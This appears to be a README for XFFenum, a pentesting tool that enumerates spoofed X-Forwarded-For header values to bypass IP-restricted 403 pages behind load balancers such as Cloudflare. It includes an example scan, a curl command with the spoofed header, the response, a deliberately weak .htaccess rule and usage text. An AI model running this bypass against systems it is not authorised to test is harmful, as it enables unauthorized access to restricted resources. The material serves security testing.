Awesome
XFFenum
A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header
Based on the enumXFF by @infosec_au
Example
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16
__ _______ _____
\ \/ / ___| ___|__ _ __ _ _ _ __ ___
\ /| |_ | |_ / _ \ '_ \| | | | '_ ` _ \
/ \| _| | _| __/ | | | |_| | | | | | |
/_/\_\_| |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration
[i] Using URL: https://xss.vavkamil.cz/xff
[i] Using IP range: 192.168.0.0/16
[i] IP addresses in range: 65536
[i] Iterations required: 13108
673it [00:34, 21.69it/s]
[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41
[!] curl https://xss.vavkamil.cz/xff -H "X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"
Proof of Concept
vavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff
HTTP/2 403
date: Wed, 07 Aug 2019 20:02:41 GMT
content-type: text/html; charset=iso-8859-1
set-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 502bd9832d69c2db-FRA
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /xff
on this server.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80</address>
</body></html>
.htaccess
Order Deny,Allow
Deny from all
SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
Allow from env=AllowAccess
Usage
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -h
__ _______ _____
\ \/ / ___| ___|__ _ __ _ _ _ __ ___
\ /| |_ | |_ / _ \ '_ \| | | | '_ ` _ \
/ \| _| | _| __/ | | | |_| | | | | | |
/_/\_\_| |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration
usage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]
X-Forwarded-For [403 forbidden] enumeration
optional arguments:
-h, --help show this help message and exit
-u URL Forbidden URL patch to scan
-i IP_RANGE Signe IP or range to use
-t THREADS number of threads (default: 5)
--no-verify-ssl Ignore any and all SSL errors.
Have a nice day :)
References
https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html